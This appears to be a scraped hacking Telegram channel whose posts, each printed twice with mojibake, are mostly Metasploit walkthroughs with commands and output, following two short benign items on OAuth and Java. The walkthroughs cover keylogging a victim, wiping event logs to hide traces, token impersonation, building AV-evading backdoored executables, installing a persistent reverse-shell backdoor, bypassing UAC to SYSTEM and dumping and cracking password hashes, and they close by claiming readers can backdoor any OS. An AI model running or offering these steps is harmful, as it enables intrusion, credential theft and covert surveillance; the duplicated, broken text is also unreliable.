β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to gain access of OAuth accessBased on the above principles, OAuth 2.0 has the following points that need to be clearly recognized:
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) OAuth2.0 is not an identity authentication protocol. Although identity authentication is involved in the authorization process, the OAuth2.0 protocol itself does not process user information. When a client accesses a protected resource, it does not care about the owner of the resource.
2) OAuth2.0 does not provide some message signatures. In order to ensure security, it should not be separated from Https . When using other protocols or systems, a security mechanism should also be specified to assume the tasks undertaken by Https .
3) OAuth2.0 does not define the encryption method, although the JOSE specification is currently used more
4) OAuth2.0 Although the token is held and used by the client, the client cannot parse and process the token.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to gain access of OAuth accessBased on the above principles, OAuth 2.0 has the following points that need to be clearly recognized:
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) OAuth2.0 is not an identity authentication protocol. Although identity authentication is involved in the authorization process, the OAuth2.0 protocol itself does not process user information. When a client accesses a protected resource, it does not care about the owner of the resource.
2) OAuth2.0 does not provide some message signatures. In order to ensure security, it should not be separated from Https . When using other protocols or systems, a security mechanism should also be specified to assume the tasks undertaken by Https .
3) OAuth2.0 does not define the encryption method, although the JOSE specification is currently used more
4) OAuth2.0 Although the token is held and used by the client, the client cannot parse and process the token.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What are the limitations of Java's anonymous inner classes?
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
Ubiquitous anonymous inner classes
button.setOnClickListener (new OnClickListener () {
});
In the virtual machine, the anonymous inner class has a name, OuterClass $ 1
class RunnableFoo extends Foo implements Runnable {
};
Anonymous inner classes cannot be written like this, but local classes can be written, but kotlin can be written like this val runnableFoo = object: Foo (), Runnable {}
Constructor of anonymous inner class, generated by the compiler, the parameter list includes
1) External objects (defined in a non-static domain)
2) External objects of the parent class (parent class is not static)
3) the constructor parameter of the parent class (the parent class has a constructor and the parameter list is not empty)
4) Externally captured variables (references to external final variables in the method body)
π¦ Anonymous inner classes are prone to memory leaks
to sum up
1) No name in human cognitive sense
2) can only inherit a parent class value to implement an interface
3) the parent class is a non-static type, optionally requires an external instance of the parent class to initialize
4) If it is defined in a non-static scope, it will reference an external class instance
5) can only capture final variables in external scope
6) When creating an interface with a single method, it can be transformed with a lambda
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What are the limitations of Java's anonymous inner classes?
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
Ubiquitous anonymous inner classes
button.setOnClickListener (new OnClickListener () {
});
In the virtual machine, the anonymous inner class has a name, OuterClass $ 1
class RunnableFoo extends Foo implements Runnable {
};
Anonymous inner classes cannot be written like this, but local classes can be written, but kotlin can be written like this val runnableFoo = object: Foo (), Runnable {}
Constructor of anonymous inner class, generated by the compiler, the parameter list includes
1) External objects (defined in a non-static domain)
2) External objects of the parent class (parent class is not static)
3) the constructor parameter of the parent class (the parent class has a constructor and the parameter list is not empty)
4) Externally captured variables (references to external final variables in the method body)
π¦ Anonymous inner classes are prone to memory leaks
to sum up
1) No name in human cognitive sense
2) can only inherit a parent class value to implement an interface
3) the parent class is a non-static type, optionally requires an external instance of the parent class to initialize
4) If it is defined in a non-static scope, it will reference an external class instance
5) can only capture final variables in external scope
6) When creating an interface with a single method, it can be transformed with a lambda
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Controlling Meterpreter full-kali-parrot-debian-root termux :
> Meterpreter is a killer in the Metasploit framework. It is usually used as an attack payload after exploiting the vulnerability.
> The attack payload can return to the user a control channel after the vulnerability is triggered.
> When using Armitage, MSFCLI, or MSFCONSOLE to obtain a Meterpreter connection on the target system, the user must use Meterpreter to pass the attack payload. MSFCONSOLE is used to manage user sessions, while Meterpreter is the interaction between attack payloads and penetration attacks. This section will introduce the use of Meterpreter.
instagram.com/UndercOdeTestingCompany
π¦Meterpreter includes some common commands as shown below.:
help: View help information.
background: Allows users to have Meterpreter sessions in the background.
download: Allows users to download files from intruding hosts.
upload: Allow users to upload files to the intruding host.
execute: Allows users to execute commands on the intruding host.
shell: Allows users to run Windows shell commands on the intruding host
(Windows host only).
session -i: allows users to switch sessions.
π¦ Control is achieved by opening MSFCONSOLE. The specific operation steps are shown below:
1) Start an active session on MSFCONSOLE.
2) The login keyboard input is initiated by the user of the system. The execution command is as follows:
meterpreter > keyscan_start
Starting the keystroke snifferβ¦
From the output, you can see that keyboard input sniffing is enabled.
3) Capture keyboard input from users of vulnerable systems. The execution command is as follows:
meterpreter > keyscan_dump
Dumping captured keystrokesβ¦
<Return> www.example.site.. <Return> aaaa <Return> <Back> <Back> <Back> <Back> <Back>
information indicates that the user entered
, www.example..., the enter key, and the exit key in the vulnerable system.
4) Stop capturing keyboard input from users of the vulnerable system. The execution command is as follows:
meterpreter > keyscan_stop
Stopping the keystroke snifferβ¦
From the output, you can see that keyboard input sniffing has stopped.
5) Delete a file on the vulnerable system. The execution command is as follows:
meterpreter > del exploited.docx
6) Clear the event log on the vulnerable system. The execution command is as follows:
meterpreter > clearev
[*] Wiping 57 records from Applicationβ¦
[*] Wiping 107 records from Systemβ¦
[*] Wiping 0 records from Securityβ¦
7) The output information shows all processes running in the vulnerable system, including the process ID number, process name, system architecture, user, and the path of the running program.
8) Use kill to kill the process number specified in the vulnerable system. The execution command is as follows:
meterpreter > kill 2040
Killing: 2040
9) Attempt to steal a fake token from the vulnerable system. The execution command is as follows:
meterpreter > steal_token
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Controlling Meterpreter full-kali-parrot-debian-root termux :
> Meterpreter is a killer in the Metasploit framework. It is usually used as an attack payload after exploiting the vulnerability.
> The attack payload can return to the user a control channel after the vulnerability is triggered.
> When using Armitage, MSFCLI, or MSFCONSOLE to obtain a Meterpreter connection on the target system, the user must use Meterpreter to pass the attack payload. MSFCONSOLE is used to manage user sessions, while Meterpreter is the interaction between attack payloads and penetration attacks. This section will introduce the use of Meterpreter.
instagram.com/UndercOdeTestingCompany
π¦Meterpreter includes some common commands as shown below.:
help: View help information.
background: Allows users to have Meterpreter sessions in the background.
download: Allows users to download files from intruding hosts.
upload: Allow users to upload files to the intruding host.
execute: Allows users to execute commands on the intruding host.
shell: Allows users to run Windows shell commands on the intruding host
(Windows host only).
session -i: allows users to switch sessions.
π¦ Control is achieved by opening MSFCONSOLE. The specific operation steps are shown below:
1) Start an active session on MSFCONSOLE.
2) The login keyboard input is initiated by the user of the system. The execution command is as follows:
meterpreter > keyscan_start
Starting the keystroke snifferβ¦
From the output, you can see that keyboard input sniffing is enabled.
3) Capture keyboard input from users of vulnerable systems. The execution command is as follows:
meterpreter > keyscan_dump
Dumping captured keystrokesβ¦
<Return> www.example.site.. <Return> aaaa <Return> <Back> <Back> <Back> <Back> <Back>
information indicates that the user entered
, www.example..., the enter key, and the exit key in the vulnerable system.
4) Stop capturing keyboard input from users of the vulnerable system. The execution command is as follows:
meterpreter > keyscan_stop
Stopping the keystroke snifferβ¦
From the output, you can see that keyboard input sniffing has stopped.
5) Delete a file on the vulnerable system. The execution command is as follows:
meterpreter > del exploited.docx
6) Clear the event log on the vulnerable system. The execution command is as follows:
meterpreter > clearev
[*] Wiping 57 records from Applicationβ¦
[*] Wiping 107 records from Systemβ¦
[*] Wiping 0 records from Securityβ¦
7) The output information shows all processes running in the vulnerable system, including the process ID number, process name, system architecture, user, and the path of the running program.
8) Use kill to kill the process number specified in the vulnerable system. The execution command is as follows:
meterpreter > kill 2040
Killing: 2040
9) Attempt to steal a fake token from the vulnerable system. The execution command is as follows:
meterpreter > steal_token
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to obtain a Meterpreter Shell Using fake tokens by Underc0de :
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
In order to obtain a Meterpreter Shell, users must use Metasploit to attack a host before they can successfully establish a Meterpreter session. The method of using Metasploit to attack the host is described before on undercode chats groups ,and will not be repeated here. The specific steps for using token impersonation are shown below.
1) Start a Meterpreter session. The execution command is as follows:
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1β¦
meterpreter >
From the output, you can see that the Meterpreter session was successfully started.
2) Use the use incognito command to load the incognito module, and then enumerate the tokens. The execution command is as follows:
meterpreter > use incognito
Loading extension incognitoβ¦success.
3) now in output on your script see that the list of currently valid token commands is list_tokens. After executing the above command, a large amount of information will be output. Due to space reasons, part of the content is replaced by ellipsis (...).
π¦ List all tokens. The execution command is as follows:
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
===============================================
AA-886OKJM26FSW\Test
Impersonation Tokens Available
===============================================
No tokens available
From the output information, you can see that the valid tokens allocated are AA-886OKJM26FSW \ Test. AA-886OKJM26FSW indicates the host name of the target system, and Test indicates the user name for login.
4) Use the impersonate_token command to impersonate the Test user for attack. The execution command is as follows:
meterpreter > impersonate_token AA-886OKJM26FSW\\Test
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user AA-886OKJM26FSW\Test
From the output information, you can see that the fake Test user succeeded. At this point, you can perform any operation in the target system by elevating your permissions.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to obtain a Meterpreter Shell Using fake tokens by Underc0de :
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
In order to obtain a Meterpreter Shell, users must use Metasploit to attack a host before they can successfully establish a Meterpreter session. The method of using Metasploit to attack the host is described before on undercode chats groups ,and will not be repeated here. The specific steps for using token impersonation are shown below.
1) Start a Meterpreter session. The execution command is as follows:
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1β¦
meterpreter >
From the output, you can see that the Meterpreter session was successfully started.
2) Use the use incognito command to load the incognito module, and then enumerate the tokens. The execution command is as follows:
meterpreter > use incognito
Loading extension incognitoβ¦success.
3) now in output on your script see that the list of currently valid token commands is list_tokens. After executing the above command, a large amount of information will be output. Due to space reasons, part of the content is replaced by ellipsis (...).
π¦ List all tokens. The execution command is as follows:
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
===============================================
AA-886OKJM26FSW\Test
Impersonation Tokens Available
===============================================
No tokens available
From the output information, you can see that the valid tokens allocated are AA-886OKJM26FSW \ Test. AA-886OKJM26FSW indicates the host name of the target system, and Test indicates the user name for login.
4) Use the impersonate_token command to impersonate the Test user for attack. The execution command is as follows:
meterpreter > impersonate_token AA-886OKJM26FSW\\Test
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user AA-886OKJM26FSW\Test
From the output information, you can see that the fake Test user succeeded. At this point, you can perform any operation in the target system by elevating your permissions.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Note: You need to enter two backslashes (\) when typing HOSTNAME \ USERNAME.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Launching the Social Engineering Toolkit :
Before using the Social Engineering Toolkit, you need to launch the tool. The specific operation steps are shown below.
π¦ ππΌππ πππΈβπ :
1) Start SET. Execute the following command in the terminal:
> root@kali:~# setoolkit
>Or select "Applications" | Kali Linux | "Exploit Toolkit" | Social Engineering Toolkit |
2) Select Attack Social Engineering here, the number in the menu is 1, so enter 1 after set>, and the following information will be displayed:
set> 1
π¦ Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set>
set>
π¦ information shows the menu options for attacking social engineering, at which point you can choose the type of attack engineering and then attack.
1) Choose to create an attack payload and listener here, enter the number 4, example
2 ) The target system of the attack in this example is Windows XP 32-bit, so select number 2 here. As follows:
set:payloads> 2
3) Select one of the below, 'backdoored executable' is typically the best. However,
most still get picked up by AV. You may need to do additional packing/crypting
π¦ in order to get around basic AV detection.
1) shika..
2) No Encoding
3) Multi-Encoder
4) Backdoored Executable
The output information shows several ways to obtain an AV-based attack.
5) Select the fourth type and enter the number 4
E N J O Y B Y U N D E R C O D E
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Launching the Social Engineering Toolkit :
Before using the Social Engineering Toolkit, you need to launch the tool. The specific operation steps are shown below.
π¦ ππΌππ πππΈβπ :
1) Start SET. Execute the following command in the terminal:
> root@kali:~# setoolkit
>Or select "Applications" | Kali Linux | "Exploit Toolkit" | Social Engineering Toolkit |
2) Select Attack Social Engineering here, the number in the menu is 1, so enter 1 after set>, and the following information will be displayed:
set> 1
π¦ Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set>
set>
π¦ information shows the menu options for attacking social engineering, at which point you can choose the type of attack engineering and then attack.
1) Choose to create an attack payload and listener here, enter the number 4, example
2 ) The target system of the attack in this example is Windows XP 32-bit, so select number 2 here. As follows:
set:payloads> 2
3) Select one of the below, 'backdoored executable' is typically the best. However,
most still get picked up by AV. You may need to do additional packing/crypting
π¦ in order to get around basic AV detection.
1) shika..
2) No Encoding
3) Multi-Encoder
4) Backdoored Executable
The output information shows several ways to obtain an AV-based attack.
5) Select the fourth type and enter the number 4
E N J O Y B Y U N D E R C O D E
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How Dump Hack data- Collecting Target System Data
The attack payload was passed to the target system and the session was successfully established. well lets start !
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
When a session is successfully established, an attacker can collect its data from the target system. Collect the data of the target system to enable users to use this information as far as possible for further penetration attacks. Collecting data for the target system is described below. The specific steps to collect data for the target system are shown below.
1) Activate Meterpreter session. The execution command is as follows:
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1β¦
2) Turn on the keylogger. The execution command is as follows:
meterpreter > keyscan_start
Starting the keystroke snifferβ¦
3) Collect data from the target system. The execution command is as follows:
meterpreter > keyscan_dump
Dumping captured keystrokesβ¦
<Return> <Return> <Return> <N1> <Return> 2 <Return> 34
From the output information, you can see that the target system has executed the Enter key, entered numbers 1, 2, and 34.
7.3.4 Clear trail
4) When an attacker invades the target system, any operation performed by the attacker may be recorded in the target system's log file. In order not to be found by the target system, it is very important to clear the trail. Because if it is found, it can cause a lot of trouble. Now users don't need to worry about this problem, because Metasploit provides a way to easily remove all traces. Here's how to use Metasploit to clear your tracks.
π¦ The specific steps to clear the trail using Metasploit are shown below.
1) Activate Meterpreter session. The execution command is as follows:
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1β¦
2) The irb command in Metasploit can clear the trace. The execution command is as follows:
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>>
When you see the >> prompt in the output, it means that the irb command was successfully run.
3) Set the log you want to delete. The common log options are as follows:
log = client.sys.eventlog.open ('system');
log = client.sys.eventlog.open ('security');
log = client.sys.eventlog.open ('application');
log = client.sys.eventlog.open ('directory service');
log = client.sys.eventlog.open ('dns server');
log = client.sys.eventlog.open ('file replication service').
Clear all logs here. The execution command is as follows:
>> log = client.sys.eventlog.open('system')
>> log = client.sys.eventlog.open('security')
>> log = client.sys.eventlog.open('application')
>> log = client.sys.eventlog.open('directory service')
>> log = client.sys.eventlog.open('dns server')
>> log = client.sys.eventlog.open('file replication service')
4) After executing the above command, it means that the log to be cleared is specified. Next, you need to execute the log.clear command to clear the log file. The execution command is as follows:
>> log.clear
5) After executing the above command, the user's trail will be hidden.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How Dump Hack data- Collecting Target System Data
The attack payload was passed to the target system and the session was successfully established. well lets start !
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
When a session is successfully established, an attacker can collect its data from the target system. Collect the data of the target system to enable users to use this information as far as possible for further penetration attacks. Collecting data for the target system is described below. The specific steps to collect data for the target system are shown below.
1) Activate Meterpreter session. The execution command is as follows:
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1β¦
2) Turn on the keylogger. The execution command is as follows:
meterpreter > keyscan_start
Starting the keystroke snifferβ¦
3) Collect data from the target system. The execution command is as follows:
meterpreter > keyscan_dump
Dumping captured keystrokesβ¦
<Return> <Return> <Return> <N1> <Return> 2 <Return> 34
From the output information, you can see that the target system has executed the Enter key, entered numbers 1, 2, and 34.
7.3.4 Clear trail
4) When an attacker invades the target system, any operation performed by the attacker may be recorded in the target system's log file. In order not to be found by the target system, it is very important to clear the trail. Because if it is found, it can cause a lot of trouble. Now users don't need to worry about this problem, because Metasploit provides a way to easily remove all traces. Here's how to use Metasploit to clear your tracks.
π¦ The specific steps to clear the trail using Metasploit are shown below.
1) Activate Meterpreter session. The execution command is as follows:
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1β¦
2) The irb command in Metasploit can clear the trace. The execution command is as follows:
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>>
When you see the >> prompt in the output, it means that the irb command was successfully run.
3) Set the log you want to delete. The common log options are as follows:
log = client.sys.eventlog.open ('system');
log = client.sys.eventlog.open ('security');
log = client.sys.eventlog.open ('application');
log = client.sys.eventlog.open ('directory service');
log = client.sys.eventlog.open ('dns server');
log = client.sys.eventlog.open ('file replication service').
Clear all logs here. The execution command is as follows:
>> log = client.sys.eventlog.open('system')
>> log = client.sys.eventlog.open('security')
>> log = client.sys.eventlog.open('application')
>> log = client.sys.eventlog.open('directory service')
>> log = client.sys.eventlog.open('dns server')
>> log = client.sys.eventlog.open('file replication service')
4) After executing the above command, it means that the log to be cleared is specified. Next, you need to execute the log.clear command to clear the log file. The execution command is as follows:
>> log.clear
5) After executing the above command, the user's trail will be hidden.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to Create a Persistent Backdoor by Underc0de v
1) After successfully gaining access to the target system, you need to find a way to restore the connection to the target host without having to enter the target system again.
2) If the target user breaks the connection, such as restarting the computer, using a backdoor at this time will allow the connection to the target system to be automatically re-established. To facilitate subsequent infiltrations, a backdoor needs to be created. This way, even if the connection is interrupted, it will not affect the work.
π¦ Here's how to create a persistent backdoor. The specific steps to create a durable backdoor are shown below.
1) iniciado Meterpreter session. The execution command is as follows:
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1β¦
meterpreter >
2) Before creating a persistent backdoor, check its help file
above information shows some options for durable backdoors. Use different options to set up the backdoor.
3) Create a durable backdoor. The execution command is as follows:
meterpreter > run persistence -U -A -i 10 - 8090 -r 192.168.41.234
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/
AA-886OKJM26FSW_20140507.2857/AA-886OKJM26FSW_20140507.2857.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.41.234 LPORT=4444
[*] Persistent agent script is 148405 bytes long
[+] Persistent Script written to C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs
[+] Agent executed with PID 1612
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\
CurrentVersion\Run\mERugsIe
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\
CurrentVersion\Run\mERugsIe
5) The output shows a process for creating a backdoor. In the above information, you can see that a persistent script was created in the target system and saved in C: \ DOCUME ~ 1 \ Test \ LOCALS ~ 1 \ Temp \ IzXBdJvcpnD.vbs. And, the script will automatically run on the target host, at which point a second Meterpreter session will be established. As follows:
> meterpreter > [*] Meterpreter session 2 opened (192.168.41.234:443 -> 192.168.41.146:1032)
>Well done!
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to Create a Persistent Backdoor by Underc0de v
1) After successfully gaining access to the target system, you need to find a way to restore the connection to the target host without having to enter the target system again.
2) If the target user breaks the connection, such as restarting the computer, using a backdoor at this time will allow the connection to the target system to be automatically re-established. To facilitate subsequent infiltrations, a backdoor needs to be created. This way, even if the connection is interrupted, it will not affect the work.
π¦ Here's how to create a persistent backdoor. The specific steps to create a durable backdoor are shown below.
1) iniciado Meterpreter session. The execution command is as follows:
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1β¦
meterpreter >
2) Before creating a persistent backdoor, check its help file
above information shows some options for durable backdoors. Use different options to set up the backdoor.
3) Create a durable backdoor. The execution command is as follows:
meterpreter > run persistence -U -A -i 10 - 8090 -r 192.168.41.234
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/
AA-886OKJM26FSW_20140507.2857/AA-886OKJM26FSW_20140507.2857.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.41.234 LPORT=4444
[*] Persistent agent script is 148405 bytes long
[+] Persistent Script written to C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs
[+] Agent executed with PID 1612
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\
CurrentVersion\Run\mERugsIe
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\
CurrentVersion\Run\mERugsIe
5) The output shows a process for creating a backdoor. In the above information, you can see that a persistent script was created in the target system and saved in C: \ DOCUME ~ 1 \ Test \ LOCALS ~ 1 \ Temp \ IzXBdJvcpnD.vbs. And, the script will automatically run on the target host, at which point a second Meterpreter session will be established. As follows:
> meterpreter > [*] Meterpreter session 2 opened (192.168.41.234:443 -> 192.168.41.146:1032)
>Well done!
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦After Those Tutorials you are able to dump, and backdoor any OS, Only For Underc0de, enjoy
Forwarded from U
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Cracking the LM Hashes password on any kali-parrot os
LM (LAN Manager) Hash is one of the earliest password hashing algorithms used in the Windows operating system.
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
> This was the only version available until the more advanced NTLMv2 was used in Windows 2000, XP, Vista, and Windows 7.
> Although these new operating systems can support the use of LM hashing, they are mainly intended to provide backward compatibility. However, in Windows Vista and Windows 7, the algorithm is disabled by default.
> This section will introduce how to crack LM Hashes password.
In Kali Linux, you can use the findmyhash tool to crack the LM Hashes password. The syntax of the findmyhash command is as follows:
findmyhash <Encryption> -h hash
> The meaning of each option in the above syntax is shown below.
Encryption: Specify the type of hash encryption used.
-h: specifies the LM hash value to be cracked.
[Example 8-2] Use the findmyhash command to attack the LM Hashes
password. The execution command is as follows:
>root@kali:~# findmyhash MD5 -h 5f4dcc3b5aa765d61d8327deb882cf99
> Cracking hash: 5f4dcc3b5aa765d61d8327deb882cf99
> Analyzing with md5hood (http://md5hood.com)β¦
β¦ hash not found in md5hood
>Analyzing with stringfunction (http://www.stringfunction.com)β¦
β¦ hash not found in stringfunction
> Analyzing with 99k.org (http://xanadrel.99k.org)β¦
β¦ hash not found in 99k.org
>Analyzing with sans (http://isc.sans.edu)β¦
β¦ hash not found in sans
> Analyzing with bokehman (http://bokehman.com)β¦
β¦ hash not found in bokehman
> Analyzing with goog.li (http://goog.li)β¦
β¦ hash not found in goog.li
> Analyzing with schwett (http://schwett.com)β¦
β¦ hash not found in schwett
> Analyzing with netmd5crack (http://www.netmd5crack.com)β¦
β¦ hash not found in netmd5crack
> Analyzing with md5-cracker (http://www.md5-cracker.tk)β¦
β¦ hash not found in md5-cracker
> Analyzing with benramsey (http://tools.benramsey.com)β¦
β¦ hash not found in benramsey
> Analyzing with gromweb (http://md5.gromweb.com)β¦
***** HASH CRACKED!! *****
The original string is: password
The following hashes were cracked:
----------------------------------
5f4dcc3b5aa765d61d8327deb882cf99 -> password
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Cracking the LM Hashes password on any kali-parrot os
LM (LAN Manager) Hash is one of the earliest password hashing algorithms used in the Windows operating system.
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
> This was the only version available until the more advanced NTLMv2 was used in Windows 2000, XP, Vista, and Windows 7.
> Although these new operating systems can support the use of LM hashing, they are mainly intended to provide backward compatibility. However, in Windows Vista and Windows 7, the algorithm is disabled by default.
> This section will introduce how to crack LM Hashes password.
In Kali Linux, you can use the findmyhash tool to crack the LM Hashes password. The syntax of the findmyhash command is as follows:
findmyhash <Encryption> -h hash
> The meaning of each option in the above syntax is shown below.
Encryption: Specify the type of hash encryption used.
-h: specifies the LM hash value to be cracked.
[Example 8-2] Use the findmyhash command to attack the LM Hashes
password. The execution command is as follows:
>root@kali:~# findmyhash MD5 -h 5f4dcc3b5aa765d61d8327deb882cf99
> Cracking hash: 5f4dcc3b5aa765d61d8327deb882cf99
> Analyzing with md5hood (http://md5hood.com)β¦
β¦ hash not found in md5hood
>Analyzing with stringfunction (http://www.stringfunction.com)β¦
β¦ hash not found in stringfunction
> Analyzing with 99k.org (http://xanadrel.99k.org)β¦
β¦ hash not found in 99k.org
>Analyzing with sans (http://isc.sans.edu)β¦
β¦ hash not found in sans
> Analyzing with bokehman (http://bokehman.com)β¦
β¦ hash not found in bokehman
> Analyzing with goog.li (http://goog.li)β¦
β¦ hash not found in goog.li
> Analyzing with schwett (http://schwett.com)β¦
β¦ hash not found in schwett
> Analyzing with netmd5crack (http://www.netmd5crack.com)β¦
β¦ hash not found in netmd5crack
> Analyzing with md5-cracker (http://www.md5-cracker.tk)β¦
β¦ hash not found in md5-cracker
> Analyzing with benramsey (http://tools.benramsey.com)β¦
β¦ hash not found in benramsey
> Analyzing with gromweb (http://md5.gromweb.com)β¦
***** HASH CRACKED!! *****
The original string is: password
The following hashes were cracked:
----------------------------------
5f4dcc3b5aa765d61d8327deb882cf99 -> password
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from U
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦if You think that cracking LM Hashes is too slow, you can use the psexec module in Metasploit to bypass the hash value. The method of bypassing the hash value using the psexec module will be described below:
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) By running the executable file backup.exe created by Veil on the target host (Windows 7), successfully obtain an active remote session, as shown below:
[*] Started reverse handler on 192.168.6.103:4444
[*] Starting the payload handlerβ¦
[*] Sending stage (769536 bytes) to 192.168.6.106
[*] Meterpreter session 1 opened (192.168.6.103:4444 -> 192.168.6.106:49160) at 2014-07-22 15:29:55 +0800
From the above information, you can see that Session 1 was successfully opened.
2) View user rights information. The execution command is as follows:
meterpreter > getuid
Server username: WIN-RKPKQFBLG6C\lyw
From the output information, you can see that the user's permission is a normal permission. Next, bypass the UAC using the bypassuac module.
3) Set lyw users to bypass UAC. The execution command is as follows:
meterpreter > background
[*] Backgrounding session 1β¦
msf exploit(handler) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set session 1
session => 1
msf exploit(bypassuac) > exploit
[*] Started reverse handler on 192.168.6.103:4444
[*] UAC is Enabled, checking levelβ¦
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuingβ¦
[+] Part of Administrators group! Continuingβ¦
[*] Uploaded the agent to the filesystemβ¦.
[*] Uploading the bypass UAC executable to the filesystemβ¦
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (769536 bytes) to 192.168.6.106
[*] Meterpreter session 3 opened (192.168.6.103:4444 -> 192.168.6.106:49160) at 2014-07-22 15:34:38 +0800
meterpreter > getsystem
β¦got system (via technique 1).
meterpreter > getuid
> Server username: NT AUTHORITY\SYSTEM
From the output information, you can see that the lyw user authority is SYSTEM at this time.
4) View the hash password values of all users on the target host. The execution command is as follows:
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot keyβ¦
[*] Calculating the hboot key using SYSKEY 45fa5958a01cf2b66b73daa174b19daeβ¦
[*] Obtaining the user list and keysβ¦
[*] Decrypting user keysβ¦
[*] Dumping password hintsβ¦
Test:"123"
[*] Dumping password hashesβ¦
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Test:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:daf26fce5b47e01aae0f919f529926e3:::
lyw:1003:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
